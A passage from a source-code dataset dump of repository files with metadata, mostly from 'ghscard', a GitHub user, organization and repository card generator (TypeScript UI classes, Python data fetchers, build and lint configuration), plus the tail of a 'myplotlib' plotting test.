str(k+1)\n\t\t\t_fig.save(fname = str(Path(f'{directory}/{file_name}.{format}')), *args, **kwargs)\n\t\tif delete_all == True:\n\t\t\tself.delete_all()\n\t\n\tdef show(self):\n\t\tfor fig in self.figures:\n\t\t\tfig.show()\n\t\n\tdef delete(self, fig):\n\t\tself.figures.remove(fig)\n\t\tfig.close()\n\t\n\tdef delete_all_figs(self):\n\t\tfor fig in self.figures:\n\t\t\tfig.close()\n\t\tself.figures = []\n\t\n\tdef delete_all(self):\n\t\tself.delete_all_figs()\n\nmanager = FigureManager()\n" }, { "alpha_fraction": 0.5930831432342529, "alphanum_fraction": 0.5967622995376587, "avg_line_length": 17.616437911987305, "blob_id": "a654017a991f236836031d8b179eab1916c65439", "content_id": "71dc8f01695b275f4a34d65fa498acc42d9d2b7c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1359, "license_type": "permissive", "max_line_length": 50, "num_lines": 73, "path": "/tests/test_contour_colormap.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(-1,1)\ny = x\nxx, yy = np.meshgrid(x,y)\nzz = xx**4 + yy**2 + np.random.rand(*xx.shape)*.1\n\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'colormap with {package} linear scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 'equal',\n\t)\n\tfig.colormap(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'contour with {package} linear scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 'equal',\n\t)\n\tfig.contour(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'colormap with {package} log scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 'equal',\n\t)\n\tfig.colormap(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t\tnorm = 'log',\n\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'contour with {package} log scale',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t\taspect = 'equal',\n\t)\n\tfig.contour(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'Colormap value',\n\t\tnorm = 'log',\n\t)\n\nmpl.manager.save_all()\n" } ]
13
thombashi/ghscard
https://github.com/thombashi/ghscard
297f005d10e620a1683ccf792ff5f18a9053292f
bda862f9148f45b832b8eda125d8dc8240f8a386
cfb489b95ee4bb376ad54042ca1e6e9d9feee3bd
refs/heads/master
2023-08-13T19:50:32.832361
2023-03-11T15:15:31
2023-03-11T15:15:31
85,590,529
11
0
MIT
2017-03-20T15:01:32
2021-10-02T10:07:08
2023-07-20T07:48:02
JavaScript
[ { "alpha_fraction": 0.6277056336402893, "alphanum_fraction": 0.6277056336402893, "avg_line_length": 22.100000381469727, "blob_id": "c466dd60a3546ce02f1e217eb38cc0f68e68f7aa", "content_id": "9f95a286df3f5a0a0676c4a7cf972ee3d0a3293b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 462, "license_type": "permissive", "max_line_length": 66, "num_lines": 20, "path": "/src/card/organization/medium.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractOrgCardGerator } from \"./base_organization\";\n\nexport class MediumOrgCardGerator extends AbstractOrgCardGerator {\n protected get headerSize(): UiSize {\n return \"large\";\n }\n\n protected get infoSize(): UiSize {\n return \"medium\";\n }\n\n protected get popupSize(): UiSize {\n return \"medium\";\n }\n\n protected get avatarColumnWide(): string {\n return \"eight\";\n }\n}\n" }, { "alpha_fraction": 0.6201192736625671, "alphanum_fraction": 0.6214656829833984, "avg_line_length": 35.87234115600586, "blob_id": "8987cd822015e9a125ebcfb39e9e661954a121ce", "content_id": "c09efb18d6acff82f14fe0a0552162a8198d4850", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5199, "license_type": "permissive", "max_line_length": 100, "num_lines": 141, "path": "/ghscard/fetcher/_repository.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport random\nimport time\nfrom typing import Any, Dict, List, cast\n\nimport typepy\n\nfrom .._const import DATETIME_FORMAT, RETRY_COUNT, CardType, CommonCardKey, Result\nfrom ._base import AbstractCardDataFetcher, CardData\nfrom ._common import dump_organization, to_chart_data\n\n\ndef ghc_client_thread_helper(ghc_client) -> Dict[str, Any]:\n return {\n \"branches_count\": ghc_client.branches_count,\n \"pulls_count\": ghc_client.pulls_count,\n \"subscribers_count\": ghc_client.repo.get(\"subscribers_count\"),\n \"license\": ghc_client.repo.get(\"license\"),\n }\n\n\ndef get_contributors_count_helper(ghc_client) -> Dict[str, Any]:\n return {\"contributors_count\": ghc_client.contributors_count}\n\n\ndef get_tags_count_helper(ghc_client) -> Dict[str, Any]:\n return {\"tags_count\": ghc_client.tags_count}\n\n\ndef get_open_issues_helper(repo) -> Dict[str, Dict[str, list]]:\n import collections\n\n issue_counter = None\n\n for issue in repo.get_issues():\n label_names = [label.name for label in issue.labels]\n if not label_names:\n label_names = [\"not set\"]\n\n if issue_counter is None:\n issue_counter = collections.Counter(label_names)\n else:\n issue_counter += collections.Counter(label_names)\n\n return {\n \"open_issues\": to_chart_data(\n cast(collections.Counter, issue_counter), aggregate_threshold=7\n )\n }\n\n\nclass RepositoryCardDataFetcher(AbstractCardDataFetcher):\n @property\n def type(self) -> str:\n return CardType.REPOSITORY\n\n def fetch(self) -> CardData:\n self._logger.debug(f\"fetching repository data: id={self.id}\")\n\n thread_list = [\n self._pool.apply_async(ghc_client_thread_helper, args=[self._ghc_client]),\n self._pool.apply_async(get_contributors_count_helper, args=[self._ghc_client]),\n self._pool.apply_async(get_tags_count_helper, args=[self._ghc_client]),\n ]\n\n card_data = super().fetch()\n repo = self._pygh_client.get_repo(self.id)\n\n thread_list.append(self._pool.apply_async(get_open_issues_helper, args=[repo]))\n\n card_data[CommonCardKey.AVATAR_URL] = repo.owner.avatar_url\n card_data[CommonCardKey.CARD_TYPE] = CardType.REPOSITORY\n card_data[CommonCardKey.CREATED_AT] = repo.created_at.strftime(DATETIME_FORMAT)\n card_data[CommonCardKey.DESCRIPTION] = repo.description\n card_data[CommonCardKey.EMOJIS] = self._get_emoji_mapping(repo.description)\n card_data[CommonCardKey.HTML_URL] = repo.html_url\n card_data[CommonCardKey.NAME] = repo.name\n card_data[CommonCardKey.UPDATED_AT] = repo.updated_at.strftime(DATETIME_FORMAT)\n\n languages = repo.get_languages()\n\n card_data[\"forks_count\"] = repo.forks_count\n card_data[\"has_issues\"] = repo.has_issues\n card_data[\"has_wiki\"] = repo.has_wiki\n card_data[\"language\"] = repo.language\n card_data[\"languages\"] = to_chart_data(languages, aggregate_threshold=4)\n card_data[\"languages_count\"] = len(languages)\n card_data[\"owner_name\"] = repo.owner.name\n card_data[\"owner_html_url\"] = repo.owner.html_url\n card_data[\"open_issues_count\"] = repo.open_issues_count\n card_data[\"organization\"] = dump_organization(repo.organization)\n card_data[\"repo_homepage\"] = None if typepy.is_null_string(repo.homepage) else repo.homepage\n card_data[\"stargazers_count\"] = repo.stargazers_count\n card_data[\"topics\"] = self.__get_topics()\n\n for i in range(RETRY_COUNT):\n try:\n card_data[\"participation\"] = repo.get_stats_participation().all # type: ignore\n except AttributeError:\n max_sleep_secs = 2**i # noqa\n self._logger.warn(\n f\"failed to get '{self.id}' participation stats. retrying in 5 seconds\"\n )\n card_data[\"participation\"] = []\n time.sleep(random.random())\n continue\n\n break\n else:\n self._logger.error(\"failed to get participation stats\")\n card_data[CommonCardKey.RESULT] = Result.ERROR\n\n card_data[\"commits_last_year\"] = sum(cast(List[int], card_data[\"participation\"]))\n\n try:\n card_data[\"latest_tag\"] = repo.get_tags()[0].name\n except IndexError:\n self._logger.debug(\"tag not found in the repository\")\n\n for i, thread in enumerate(thread_list):\n thead_id = f\"thread {i + 1:d}/{len(thread_list):d}\"\n self._logger.debug(f\"wait for {thead_id}\")\n card_data.update(thread.get())\n self._logger.debug(f\"complete {thead_id}\")\n\n return card_data\n\n # def __get_releases(self):\n # return self._ghc_client.get(\"/repos/{:s}/releases\".format(self.id))\n\n def __get_topics(self) -> List[str]:\n values = self._ghc_client.get(\n f\"/repos/{self.id:s}\",\n headers={\"accept\": \"application/vnd.github.mercy-preview+json\"},\n )\n # get topics: https://developer.github.com/v3/repos/\n\n return cast(List[str], values.get(\"topics\"))\n" }, { "alpha_fraction": 0.4576271176338196, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 18.66666603088379, "blob_id": "fe1dd89de8eb4ae9ef5e75b6494ce66d79ecdb26", "content_id": "fdc4c508cc3913ea9f5cbe62deb18a6c6dda925a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 236, "license_type": "permissive", "max_line_length": 24, "num_lines": 12, "path": "/requirements/requirements.txt", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "appconfigpy>=2.0.0,<3\nclick>=6.2,<9\ncolorama>=0.3.7,<1\nLogbook>=0.12.3,<2\nDateTimeRange>=2.1.0,<3\nmsgfy>=0.1.0,<1\npath>=13,<17\npathvalidate>=2.5.0,<4\nPyGithub>=1.43.7,<2\nretryrequests>=0.0.2,<1\ntypepy>=1.1.4,<2\ntyping-extensions>=3.7.4\n" }, { "alpha_fraction": 0.6386138796806335, "alphanum_fraction": 0.6386138796806335, "avg_line_length": 20.263158798217773, "blob_id": "3108fd4423dfefe1bafdc78557ea1785bf3b68a6", "content_id": "b9d8b534fb0f424f0f2d8503a8b4bb76f7b63c31", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "permissive", "max_line_length": 55, "num_lines": 19, "path": "/ghscard/_logger.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport logbook\nimport typepy\n\n\ndef get_logger(log_level: int, extra_name: str):\n logger_name_list = []\n if typepy.is_not_null_string(extra_name):\n logger_name_list.append(extra_name)\n\n logger = logbook.Logger(\" \".join(logger_name_list))\n logger.level = log_level\n if log_level == logbook.NOTSET:\n logger.disable()\n\n return logger\n" }, { "alpha_fraction": 0.6072772741317749, "alphanum_fraction": 0.6135508418083191, "avg_line_length": 17.9761905670166, "blob_id": "bd27a3bb894d2bed150a7c039afbf43dd0e77226", "content_id": "4410b28d80c96bc33b9816ed826531420b3c949e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 797, "license_type": "permissive", "max_line_length": 64, "num_lines": 42, "path": "/ghscard/_const.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nPROGRAM_NAME = \"ghscard\"\n\nCARD_DATA_VERSION = 2\nDATETIME_FORMAT = \"%Y-%m-%dT%H:%M:%S%z\"\nMAX_PER_PAGE = 100\nRETRY_COUNT = 3\n\n\nclass AppConfigKey:\n GITHUB_API_ACCESS_TOKEN = \"github_api_personal_access_token\"\n OUTPUT_DIR = \"output_dir\"\n INDENT = \"indent\"\n\n\nclass CardType:\n USER = \"User\"\n ORGANIZATION = \"Organization\"\n REPOSITORY = \"Repository\"\n\n\nclass CommonCardKey:\n AVATAR_URL = \"avatar_url\"\n CARD_TYPE = \"card_type\"\n CREATED_AT = \"created_at\"\n DESCRIPTION = \"description\"\n EMOJIS = \"emojis\"\n FETCHD_AT = \"fetched_at\"\n HTML_URL = \"html_url\"\n ID = \"id\"\n NAME = \"name\"\n RESULT = \"result\"\n UPDATED_AT = \"updated_at\"\n VERSION = \"data_version\"\n\n\nclass Result:\n SUCCESS = \"success\"\n ERROR = \"error\"\n" }, { "alpha_fraction": 0.5473790168762207, "alphanum_fraction": 0.5473790168762207, "avg_line_length": 18.643564224243164, "blob_id": "177c7b7ba5bc35a9ae90076c76d5f758cbf6f399", "content_id": "c56221339afc437ea5d24b03b30b8c535f713485", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1984, "license_type": "permissive", "max_line_length": 77, "num_lines": 101, "path": "/src/types.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "export type DateTimeKey = \"created_at\" | \"fetched_at\" | \"updated_at\";\n\ntype CommonCardDataKey =\n | DateTimeKey\n | \"avatar_url\"\n | \"card_type\"\n | \"description\"\n | \"html_url\"\n | \"id\"\n | \"name\"\n | \"version\";\n\nexport type CardStyle = \"medium\" | \"small\" | \"tiny\";\n\nexport type CardType = \"organization\" | \"repository\" | \"user\";\n\nexport type ElementDisplay = \"block\" | \"none\";\n\nexport type UiColor =\n | \"red\"\n | \"orange\"\n | \"yellow\"\n | \"olive\"\n | \"green\"\n | \"teal\"\n | \"blue\"\n | \"violet\"\n | \"purple\"\n | \"pink\"\n | \"brown\"\n | \"grey\"\n | \"black\";\n\nexport type UiSize = \"huge\" | \"large\" | \"medium\" | \"small\" | \"tiny\" | \"mini\";\n\nexport type UserOrgCardDataKey =\n | CommonCardDataKey\n | \"blog\"\n | \"company\"\n | \"contributions\"\n | \"email\"\n | \"followers\"\n | \"following\"\n | \"location\"\n | \"organizations\"\n | \"profile_name\"\n | \"public_gists\"\n | \"public_members_count\"\n | \"public_repos\"\n | \"stars\";\n\nexport type OrgCardDataKey =\n | CommonCardDataKey\n | \"blog\"\n | \"company\"\n | \"email\"\n | \"location\"\n | \"public_members_count\"\n | \"public_repos\";\n\nexport type UserCardDataKey =\n | CommonCardDataKey\n | \"blog\"\n | \"company\"\n | \"contributions\"\n | \"email\"\n | \"followers\"\n | \"following\"\n | \"location\"\n | \"organizations\"\n | \"profile_name\"\n | \"public_gists\"\n | \"public_repos\"\n | \"stars\";\n\nexport type RepoCardDataKey =\n | CommonCardDataKey\n | \"commits_last_year\"\n | \"branches_count\"\n | \"contributors_count\"\n | \"forks_count\"\n | \"has_issues\"\n | \"has_wiki\"\n | \"language\"\n | \"languages\"\n | \"languages_count\"\n | \"latest_tag\"\n | \"license\"\n | \"open_issues_count\"\n | \"open_issues\"\n | \"organization\"\n | \"owner_name\"\n | \"owner_html_url\"\n | \"participation\"\n | \"pulls_count\"\n | \"repo_homepage\"\n | \"stargazers_count\"\n | \"subscribers_count\"\n | \"tags_count\"\n | \"topics\"\n | \"watchers_count\";\n" }, { "alpha_fraction": 0.6758865118026733, "alphanum_fraction": 0.6836879253387451, "avg_line_length": 17.799999237060547, "blob_id": "2d9f5601058c46c8d4051228638feb5e7d8c0252", "content_id": "5f5cbffe9c499ef4c959af8a90092a8c97777485", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1410, "license_type": "permissive", "max_line_length": 125, "num_lines": 75, "path": "/Makefile", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "PACKAGE := ghscard\nDOCS_DIR := docs\nDOCS_BUILD_DIR := $(DOCS_DIR)/_build\nPYTHON := python3\n\n\n.PHONY: build\nbuild: clean\n\t@npm run-script build\n\t@tox -e build\n\tls -lh dist/*\n\t@cp dist/ghscard.js test/html/\n\n.PHONY: check\ncheck:\n\tnpm run-script lint\n\t@tox -e lint\n\t$(PYTHON) -m pip check\n\n.PHONY: upgrade\nupgrade:\n\t@npx ncu --upgrade --timeout 60000\n\t@npm install\n\n.PHONY: clean\nclean:\n\t@npm run-script clean\n\t@tox -e clean\n\t@-rm $(PACKAGE)-*.tgz\n\n.PHONY: docs\ndocs:\n\t@tox -e docs\n\n.PHONY: fmt\nfmt:\n\t@tox -e fmt\n\tnpx prettier --tab-width 4 --print-width 100 --trailing-comma es5 --write \"**/*.ts\" --ignore-path \"$(CURDIR)/node_modules/*\"\n\tnpm run-script lint-fix\n\n.PHONY: readme\nreadme:\n\t@tox -e readme\n\n.PHONY: release\nrelease:\n\t@$(PYTHON) setup.py release --sign --search-dir $(PACKAGE)\n\t@$(MAKE) clean\n\n.PHONY: pack\npack:\n\t@pandoc -f rst -t markdown -o README.md README.rst\n\tnpm pack\n\n.PHONY: publish\npublish:\n\tpandoc -f rst -t markdown -o README.md README.rst\n\tnpm publish\n\n.PHONY: setup-ci\nsetup-ci:\n\t@$(PYTHON) -m pip install -q --disable-pip-version-check --upgrade tox\n\n.PHONY: setup\nsetup: setup-ci\n\t@$(PYTHON) -m pip install -q --disable-pip-version-check --upgrade -e .[test] releasecmd\n\tnpm install\n\t@$(PYTHON) -m pip check\n\n\n.PHONY: install\ninstall:\n\tcp dist/ghscard.js ../thombashi.github.io/js/\n\tcp dist/ghscard.js.map ../thombashi.github.io/js/\n\tcp dist/ghscard.min.js ../thombashi.github.io/js/\n" }, { "alpha_fraction": 0.8252426981925964, "alphanum_fraction": 0.8252426981925964, "avg_line_length": 33.33333206176758, "blob_id": "bf82029cb3e756e7884cddddf613e24d8332fbcc", "content_id": "9fef978c7c4296accbc8568b9c7dc5de4617f895", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 103, "license_type": "permissive", "max_line_length": 60, "num_lines": 3, "path": "/src/card/interface.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "export interface CardGeratorInterface {\n createCard(uniqueFrameNumber: number): HTMLIFrameElement\n}\n" }, { "alpha_fraction": 0.6398190259933472, "alphanum_fraction": 0.6398190259933472, "avg_line_length": 23.55555534362793, "blob_id": "e5539b36d4127168268822733ccc764049f8ff1f", "content_id": "087b891039b2d9e0823dd29a43cc8716f13c98d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1105, "license_type": "permissive", "max_line_length": 73, "num_lines": 45, "path": "/src/card/repository/small.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { ChartSize } from \"../../const\";\nimport { UiSize } from \"../../types\";\nimport { AbstractRepositoryCardGerator } from \"./base_repository\";\n\nexport class SmallRepoCardGerator extends AbstractRepositoryCardGerator {\n protected get headerSize(): UiSize {\n return \"medium\";\n }\n\n protected get infoSize(): UiSize {\n return \"small\";\n }\n\n protected get popupSize(): UiSize {\n return \"small\";\n }\n\n protected get versionLabelSize(): UiSize {\n return \"small\";\n }\n\n protected get topicSize(): UiSize {\n return \"tiny\";\n }\n\n protected get lineChartHeight(): number {\n return ChartSize.Line.Small.HEIGHT;\n }\n\n protected get pieChartHeight(): number {\n return ChartSize.Pie.Small.HEIGHT;\n }\n\n protected get pieChartLegendFontSize(): number {\n return ChartSize.Pie.Small.LEGEND_FONT_SIZE;\n }\n\n protected get chartTitleFontSize(): number {\n return ChartSize.Line.Small.TITLE_FONT_SIZE;\n }\n\n protected get chartTickFontSize(): number {\n return ChartSize.Line.Small.TICK_FONT_SIZE;\n }\n}\n" }, { "alpha_fraction": 0.6292135119438171, "alphanum_fraction": 0.6292135119438171, "avg_line_length": 25.700000762939453, "blob_id": "a87f61b10d5bb1ce03c26a0272139dbbe7f839fa", "content_id": "1c407302df49f109a920e4a7badb32233c11e2dd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 267, "license_type": "permissive", "max_line_length": 65, "num_lines": 10, "path": "/src/main.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { CardGeneratorManager } from \"./manager\";\n\nimport $ from \"jquery\";\n\n(function (window, $) {\n $(window).on(\"load\", function () {\n const generatorCard = new CardGeneratorManager(document);\n generatorCard.generateCards();\n });\n})(window, $);\n" }, { "alpha_fraction": 0.5563463568687439, "alphanum_fraction": 0.5563463568687439, "avg_line_length": 22.41666603088379, "blob_id": "e858e0a2e675a25b281a342813cd9730392660d8", "content_id": "85cc6553d45d0c6c6b5fa9747eddd0e186c9ea7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 843, "license_type": "permissive", "max_line_length": 64, "num_lines": 36, "path": "/src/card/organization/tiny.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractOrgCardGerator } from \"./base_organization\";\n\nexport class TinyOrgCardGerator extends AbstractOrgCardGerator {\n protected get headerSize(): UiSize {\n return \"tiny\";\n }\n\n protected get infoSize(): UiSize {\n return \"tiny\";\n }\n\n protected get popupSize(): UiSize {\n return \"tiny\";\n }\n\n protected get avatarColumnWide(): string {\n return \"four\";\n }\n\n protected createPopupInfoList(): HTMLElement {\n return this._createInfoList(\n {\n email: true,\n blog: true,\n created_at: true,\n updated_at: true,\n },\n this.popupSize\n );\n }\n\n protected createCardContent(): HTMLElement {\n return this._createCardContentTiny();\n }\n}\n" }, { "alpha_fraction": 0.6448087692260742, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 17.042253494262695, "blob_id": "d0d228d311d7c8a4c195fac44ea7e07d2901a4d4", "content_id": "bbeffcf047b8040d381f2d3f865fa237ae794566", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 1281, "license_type": "permissive", "max_line_length": 95, "num_lines": 71, "path": "/tox.ini", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "[tox]\nenvlist =\n py{37,38,39,310,311}\n build\n docs\n fmt\n lint\n readme\n\n[testenv]\nextras =\n test\ncommands =\n pytest\n\n[testenv:build]\nbasepython = python3.8\ndeps =\n twine\n wheel\ncommands =\n python setup.py sdist bdist_wheel\n twine check dist/*.whl dist/*.tar.gz\n python setup.py clean --all\n\n[testenv:clean]\nskip_install = true\ndeps =\n cleanpy>=0.4\ncommands =\n cleanpy --all --exclude-envs .\n\n[testenv:docs]\nbasepython = python3.8\ndeps =\n -r{toxinidir}/requirements/docs_requirements.txt\ncommands =\n python setup.py build_sphinx --source-dir=docs/ --build-dir=docs/_build --all-files\n\n[testenv:fmt]\nskip_install = true\ndeps =\n autoflake>=2\n black>=23.1\n isort>=5\ncommands =\n black setup.py test ghscard\n autoflake --in-place --recursive --remove-all-unused-imports --ignore-init-module-imports .\n isort .\n\n[testenv:lint]\nskip_install = true\ndeps =\n codespell\n mypy>=1\n pylama\n types-simplejson\n types-click\ncommands =\n python setup.py check\n mypy ghscard setup.py\n -codespell ghscard src docs/pages examples test -q2 --check-filenames --skip \"test/html/*\"\n -pylama\n\n[testenv:readme]\nskip_install = true\nchangedir = docs\ndeps =\n readmemaker>=1.1.0\ncommands =\n python make_readme.py\n" }, { "alpha_fraction": 0.6689189076423645, "alphanum_fraction": 0.6722972989082336, "avg_line_length": 31.88888931274414, "blob_id": "0a396349726d5924a390588eff0fe6ec46317b54", "content_id": "9cacb423bf0ef4f891b7588397c6ea59e04d3e36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 296, "license_type": "permissive", "max_line_length": 100, "num_lines": 9, "path": "/fetch_js_lib_versions.sh", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\n\nfor pkg in moment.js pleasejs; do\n curl -sS https://api.cdnjs.com/libraries/${pkg}?fields=name,filename,version | jq .\ndone\n\nfor pkg in chart.js jquery fomantic-ui; do\n echo $pkg $(curl -sS https://data.jsdelivr.com/v1/package/npm/${pkg} | jq '.[\"tags\"][\"latest\"]')\ndone\n" }, { "alpha_fraction": 0.6177786588668823, "alphanum_fraction": 0.6195292472839355, "avg_line_length": 33.736488342285156, "blob_id": "7ada22bdcc77b5fb635b1c08b00fd8811a5566c9", "content_id": "10f77e3e0568f1549f5bcba1b0d6f100ffb543e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 5141, "license_type": "permissive", "max_line_length": 95, "num_lines": 148, "path": "/src/card/user/base_user.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AbstractUserOrgCardGerator } from \"../base_user_org\";\n\nexport class AbstractUserCardGerator extends AbstractUserOrgCardGerator {\n protected get statsColumnWide(): string {\n return \"seven\";\n }\n\n protected get followers(): string {\n return this.getCardData(\"followers\");\n }\n\n protected get following(): string {\n return this.getCardData(\"following\");\n }\n\n protected get publicGists(): string {\n return this.getCardData(\"public_gists\");\n }\n\n protected get stars(): string {\n return this.getCardData(\"stars\");\n }\n\n protected createCardHeader(): HTMLElement {\n const header = this.createAnchorElement(\n this.htmlUrl,\n `ui ${this.headerSize} dividing header`\n );\n\n if (this.getCardData(\"profile_name\")) {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"profile_name\")));\n\n const subheader: HTMLElement = this.createElement(\"div\", \"sub header\");\n subheader.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n\n header.appendChild(subheader);\n } else {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n }\n\n return header;\n }\n\n protected createExtraCardContent(): HTMLElement {\n const organizationsContent = this.createOrganizations();\n let validContentCount = 0;\n\n if (organizationsContent) {\n validContentCount++;\n }\n\n if (validContentCount === 0) {\n return null;\n }\n\n const extraContent = this.createElement(\"div\", \"extra content\");\n\n if (organizationsContent) {\n const header = this.createElement(\"div\", \"ui tiny header\");\n header.appendChild(this._doc.createTextNode(\"Organizations\"));\n\n const organizationSegment = this.createExtraContentSegment(validContentCount);\n organizationSegment.appendChild(header);\n organizationSegment.appendChild(organizationsContent);\n\n extraContent.appendChild(organizationSegment);\n }\n\n return extraContent;\n }\n\n private createExtraContentSegment(contenetCount: number): HTMLElement {\n if (contenetCount <= 1) {\n return this.createElement(\"div\", \"ui vertical basic compact segment\");\n }\n\n return this.createElement(\"div\", \"ui vertical segment\");\n }\n\n protected createStatisticsElement(): HTMLElement {\n const items = this.createElement(\"div\", `ui ${this.infoSize} aligned selection list`);\n\n if (Number(this.publicRepos) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=repositories\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Repositories\"));\n item.appendChild(this.createLabelElement(this.publicRepos, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.stars) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=stars\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Stars\"));\n item.appendChild(this.createLabelElement(this.stars, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.followers) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=followers\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Followers\"));\n item.appendChild(this.createLabelElement(this.followers, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.following) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=following\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Following\"));\n item.appendChild(this.createLabelElement(this.following, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.publicGists) > 0) {\n const item = this.createAnchorElement(\n `//gist.github.com/${this.getCardData(\"id\")}`,\n \"item\"\n );\n item.appendChild(this._doc.createTextNode(\"Gists\"));\n item.appendChild(this.createLabelElement(this.publicGists, this.infoSize));\n\n items.appendChild(item);\n }\n\n return items;\n }\n\n protected createOrganizations(): HTMLElement {\n const orgList = this.createElement(\"div\", \"ui mini rounded images\");\n\n Array.prototype.forEach.call(this.getCardData(\"organizations\"), (organizationData) => {\n const orgLink = this.createAnchorElement(organizationData[\"html_url\"], \"ui image\");\n orgLink.setAttribute(\"data-content\", organizationData[\"name\"]);\n orgLink.setAttribute(\"data-position\", \"top center\");\n orgLink.setAttribute(\"data-variation\", \"inverted mini\");\n orgLink.appendChild(this.createImageElement(organizationData[\"avatar_url\"]));\n\n orgList.appendChild(orgLink);\n });\n\n if (orgList.children.length === 0) {\n return null;\n }\n\n return orgList;\n }\n}\n" }, { "alpha_fraction": 0.5665071606636047, "alphanum_fraction": 0.5684210658073425, "avg_line_length": 26.5, "blob_id": "5e3e8b0710470f61bc1608cb18871452f266c9bc", "content_id": "f215beb9c753f753b534a1fefef1cda7ad0ed850", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1045, "license_type": "permissive", "max_line_length": 68, "num_lines": 38, "path": "/ghscard/_emoji.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport re\nfrom typing import Mapping, cast\n\n\nclass EmojiParser:\n __re_emoji = re.compile(r\":[\\+a-zA-Z0-9_-]+:\")\n\n def __init__(self, emoji_kv_mapping: Mapping[str, str]) -> None:\n if not emoji_kv_mapping:\n raise ValueError(\"required emoji key-value mapping\")\n\n self.__emoji_mapping = emoji_kv_mapping\n\n def get_url(self, emoji: str) -> str:\n try:\n 